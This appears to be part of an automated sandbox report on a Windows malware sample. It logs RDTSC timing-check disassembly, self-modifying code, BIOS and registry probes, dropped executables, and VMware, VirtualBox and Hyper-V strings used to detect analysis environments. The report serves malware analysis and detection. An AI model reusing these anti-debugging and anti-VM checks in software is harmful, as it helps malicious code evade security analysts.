Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D710DC second address: 4D71155 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2C4FB29Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edx, dword ptr [ebp+08h] 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F8A2C4FB2A0h 0x00000013 and esi, 5058EBB8h 0x00000019 jmp 00007F8A2C4FB29Bh 0x0000001e popfd 0x0000001f popad 0x00000020 mov eax, dword ptr [esi] 0x00000022 pushad 0x00000023 pushfd 0x00000024 jmp 00007F8A2C4FB2A4h 0x00000029 sbb ch, 00000018h 0x0000002c jmp 00007F8A2C4FB29Bh 0x00000031 popfd 0x00000032 mov esi, 4F9429CFh 0x00000037 popad 0x00000038 mov dword ptr [edx], eax 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007F8A2C4FB2A1h 0x00000041 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D71155 second address: 4D711D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2C7FDC21h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+04h] 0x0000000c pushad 0x0000000d mov bh, cl 0x0000000f mov edi, 002F3BECh 0x00000014 popad 0x00000015 mov dword ptr [edx+04h], eax 0x00000018 jmp 00007F8A2C7FDC1Bh 0x0000001d mov eax, dword ptr [esi+08h] 0x00000020 jmp 00007F8A2C7FDC26h 0x00000025 mov dword ptr [edx+08h], eax 0x00000028 jmp 00007F8A2C7FDC20h 0x0000002d mov eax, dword ptr [esi+0Ch] 0x00000030 jmp 00007F8A2C7FDC20h 0x00000035 mov dword ptr [edx+0Ch], eax 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007F8A2C7FDC1Ah 0x00000041 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D711D4 second address: 4D711D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D711D8 second address: 4D711DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D711DE second address: 4D7127F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2C4FB29Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+10h] 0x0000000c jmp 00007F8A2C4FB2A0h 0x00000011 mov dword ptr [edx+10h], eax 0x00000014 pushad 0x00000015 mov bl, ah 0x00000017 mov bx, B5BEh 0x0000001b popad 0x0000001c mov eax, dword ptr [esi+14h] 0x0000001f pushad 0x00000020 movsx ebx, ax 0x00000023 mov dh, ah 0x00000025 popad 0x00000026 mov dword ptr [edx+14h], eax 0x00000029 pushad 0x0000002a pushfd 0x0000002b jmp 00007F8A2C4FB2A5h 0x00000030 sub esi, 51703FF6h 0x00000036 jmp 00007F8A2C4FB2A1h 0x0000003b popfd 0x0000003c pushfd 0x0000003d jmp 00007F8A2C4FB2A0h 0x00000042 adc cx, 3918h 0x00000047 jmp 00007F8A2C4FB29Bh 0x0000004c popfd 0x0000004d popad 0x0000004e mov eax, dword ptr [esi+18h] 0x00000051 pushad 0x00000052 mov al, 52h 0x00000054 mov ch, dl 0x00000056 popad 0x00000057 mov dword ptr [edx+18h], eax 0x0000005a push eax 0x0000005b push edx 0x0000005c push eax 0x0000005d push edx 0x0000005e pushad 0x0000005f popad 0x00000060 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D7127F second address: 4D71294 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2C7FDC21h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D71294 second address: 4D7129A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D7129A second address: 4D7129E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D71399 second address: 4D713E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop eax 0x00000005 pushfd 0x00000006 jmp 00007F8A2C4FB2A3h 0x0000000b add cl, FFFFFFDEh 0x0000000e jmp 00007F8A2C4FB2A9h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov eax, dword ptr [esi+28h] 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F8A2C4FB29Dh 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D713E4 second address: 4D7147D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F8A2C7FDC27h 0x00000008 pop esi 0x00000009 pushfd 0x0000000a jmp 00007F8A2C7FDC29h 0x0000000f adc ecx, 26D86326h 0x00000015 jmp 00007F8A2C7FDC21h 0x0000001a popfd 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e mov dword ptr [edx+28h], eax 0x00000021 pushad 0x00000022 push eax 0x00000023 mov ah, bh 0x00000025 pop eax 0x00000026 pushfd 0x00000027 jmp 00007F8A2C7FDC25h 0x0000002c and esi, 56CB0336h 0x00000032 jmp 00007F8A2C7FDC21h 0x00000037 popfd 0x00000038 popad 0x00000039 mov ecx, dword ptr [esi+2Ch] 0x0000003c push eax 0x0000003d push edx 0x0000003e jmp 00007F8A2C7FDC1Dh 0x00000043 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D7147D second address: 4D71483 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D71483 second address: 4D714A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2C7FDC23h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [edx+2Ch], ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov ax, bx 0x00000014 mov si, di 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D714A9 second address: 4D71510 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, 22F55285h 0x00000008 pushfd 0x00000009 jmp 00007F8A2C4FB2A2h 0x0000000e and ax, 5F18h 0x00000013 jmp 00007F8A2C4FB29Bh 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c mov ax, word ptr [esi+30h] 0x00000020 jmp 00007F8A2C4FB2A6h 0x00000025 mov word ptr [edx+30h], ax 0x00000029 jmp 00007F8A2C4FB2A0h 0x0000002e mov ax, word ptr [esi+32h] 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 popad 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D71510 second address: 4D7152D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2C7FDC29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D7152D second address: 4D71533 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D71533 second address: 4D71537 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D71537 second address: 4D7155E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov word ptr [edx+32h], ax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007F8A2C4FB2A7h 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D7155E second address: 4D71564 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D71564 second address: 4D71568 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D71568 second address: 4D71593 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esi+34h] 0x0000000b jmp 00007F8A2C7FDC27h 0x00000010 mov dword ptr [edx+34h], eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D71593 second address: 4D71597 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D71597 second address: 4D715B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2C7FDC27h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D715B2 second address: 4D71649 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2C4FB2A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test ecx, 00000700h 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F8A2C4FB29Ch 0x00000016 jmp 00007F8A2C4FB2A5h 0x0000001b popfd 0x0000001c mov ebx, eax 0x0000001e popad 0x0000001f jne 00007F8A9D0B93B1h 0x00000025 pushad 0x00000026 mov bx, si 0x00000029 pushfd 0x0000002a jmp 00007F8A2C4FB2A4h 0x0000002f add eax, 7A371148h 0x00000035 jmp 00007F8A2C4FB29Bh 0x0000003a popfd 0x0000003b popad 0x0000003c or dword ptr [edx+38h], FFFFFFFFh 0x00000040 push eax 0x00000041 push edx 0x00000042 jmp 00007F8A2C4FB2A5h 0x00000047 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D71649 second address: 4D7164F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D7164F second address: 4D716A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 or dword ptr [edx+3Ch], FFFFFFFFh 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F8A2C4FB2A5h 0x00000013 jmp 00007F8A2C4FB29Bh 0x00000018 popfd 0x00000019 pushad 0x0000001a push eax 0x0000001b pop edi 0x0000001c mov si, 0511h 0x00000020 popad 0x00000021 popad 0x00000022 or dword ptr [edx+40h], FFFFFFFFh 0x00000026 jmp 00007F8A2C4FB29Ch 0x0000002b pop esi 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f push edi 0x00000030 pop ecx 0x00000031 mov ecx, ebx 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D716A0 second address: 4D716A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D90676 second address: 4D9067C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D9067C second address: 4D90694 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8A2C7FDC24h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D90694 second address: 4D906A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D906A3 second address: 4D906A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D906A7 second address: 4D906AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D906AB second address: 4D906B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D906B1 second address: 4D906B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D906B7 second address: 4D906BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D40D6A second address: 4D40D7A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8A2C4FB29Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D40D7A second address: 4D40D92 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F8A2C7FDC1Dh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D40D92 second address: 4D40DC4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2C4FB2A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F8A2C4FB2A8h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D40DC4 second address: 4D40DCA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D40DCA second address: 4D40DD0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D40DD0 second address: 4D40DD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D40DD4 second address: 4D40E0D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2C4FB2A8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d jmp 00007F8A2C4FB2A0h 0x00000012 pop ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 push edi 0x00000019 pop eax 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D40E0D second address: 4D40E13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D40E13 second address: 4D40E17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D503C4 second address: 4D503C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D503C9 second address: 4D503CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D503CF second address: 4D503F0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2C7FDC21h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov esi, 30A2F375h 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D503F0 second address: 4D50402 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8A2C4FB29Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D50402 second address: 4D5041B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2C7FDC1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D5041B second address: 4D50421 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D50421 second address: 4D50466 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2C7FDC1Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+04h] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007F8A2C7FDC1Dh 0x00000014 pushfd 0x00000015 jmp 00007F8A2C7FDC20h 0x0000001a and eax, 1D78E988h 0x00000020 jmp 00007F8A2C7FDC1Bh 0x00000025 popfd 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D50466 second address: 4D5048B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edi 0x00000005 mov di, 75F6h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push dword ptr [ebp+0Ch] 0x0000000f jmp 00007F8A2C4FB29Dh 0x00000014 push dword ptr [ebp+08h] 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D5048B second address: 4D50491 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D504BB second address: 4D504CA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2C4FB29Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D719AB second address: 4D719AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D719AF second address: 4D719B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D719B3 second address: 4D719B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D719B9 second address: 4D719F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2C4FB2A2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F8A2C4FB2A0h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F8A2C4FB29Eh 0x00000017 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 9E8B53 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00825DC7 rdtsc 0_2_00825DC7
Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\vf1vAsw4V14DJWwee1eCdfd3e4\Y-Cleaner.exeJump to dropped file
Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\vf1vAsw4V14DJWwee1eCdfd3e4\Bunifu_UI_v1.5.3.dllJump to dropped file
Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\soft[1]Jump to dropped file
Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\dll[1]Jump to dropped file
Source: C:\Users\user\Desktop\file.exe TID: 6640Thread sleep count: 39 > 30Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 6640Thread sleep time: -78039s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 2228Thread sleep count: 41 > 30Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 2228Thread sleep time: -82041s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 1476Thread sleep count: 179 > 30Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 1476Thread sleep count: 169 > 30Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 1476Thread sleep count: 164 > 30Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 1476Thread sleep count: 158 > 30Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 1476Thread sleep count: 160 > 30Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 1476Thread sleep count: 129 > 30Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 1476Thread sleep count: 132 > 30Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 1476Thread sleep count: 88 > 30Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 6488Thread sleep count: 80 > 30Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 6488Thread sleep time: -160080s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 6188Thread sleep count: 48 > 30Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 6188Thread sleep time: -96048s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 6504Thread sleep count: 46 > 30Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 6504Thread sleep time: -92046s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 528Thread sleep count: 77 > 30Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 528Thread sleep time: -154077s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 1520Thread sleep count: 78 > 30Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 1520Thread sleep time: -156078s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 6196Thread sleep count: 66 > 30Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 6196Thread sleep time: -132066s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004176E7 FindFirstFileExW,0_2_004176E7
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_10007EA9 FindFirstFileExW,0_2_10007EA9
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04B4794E FindFirstFileExW,0_2_04B4794E
Source: file.exe, file.exe, 00000000.00000002.2922575318.00000000009A1000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: Amcache.hve.6.drBinary or memory string: VMware
Source: Amcache.hve.6.drBinary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.6.drBinary or memory string: vmci.syshbin
Source: Amcache.hve.6.drBinary or memory string: VMware, Inc.
Source: Amcache.hve.6.drBinary or memory string: VMware20,1hbin@
Source: Amcache.hve.6.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.6.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.6.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: file.exe, 00000000.00000003.2462863476.0000000005583000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2336836012.0000000005583000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2412397203.0000000005583000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2387108968.0000000005583000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2538613139.0000000005583000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2513460894.0000000005583000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2488030998.0000000005583000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2311558878.0000000005583000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2437588864.0000000005583000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2611648947.0000000005583000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2361967106.0000000005583000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: Amcache.hve.6.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: file.exe, 00000000.00000002.2923721847.0000000000FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP~X
Source: Amcache.hve.6.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.6.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.6.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.6.drBinary or memory string: vmci.sys
Source: Amcache.hve.6.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.6.drBinary or memory string: vmci.syshbin`
Source: Amcache.hve.6.drBinary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.6.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.6.drBinary or memory string: VMware20,1
Source: Amcache.hve.6.drBinary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.6.drBinary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.6.drBinary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.6.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.6.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
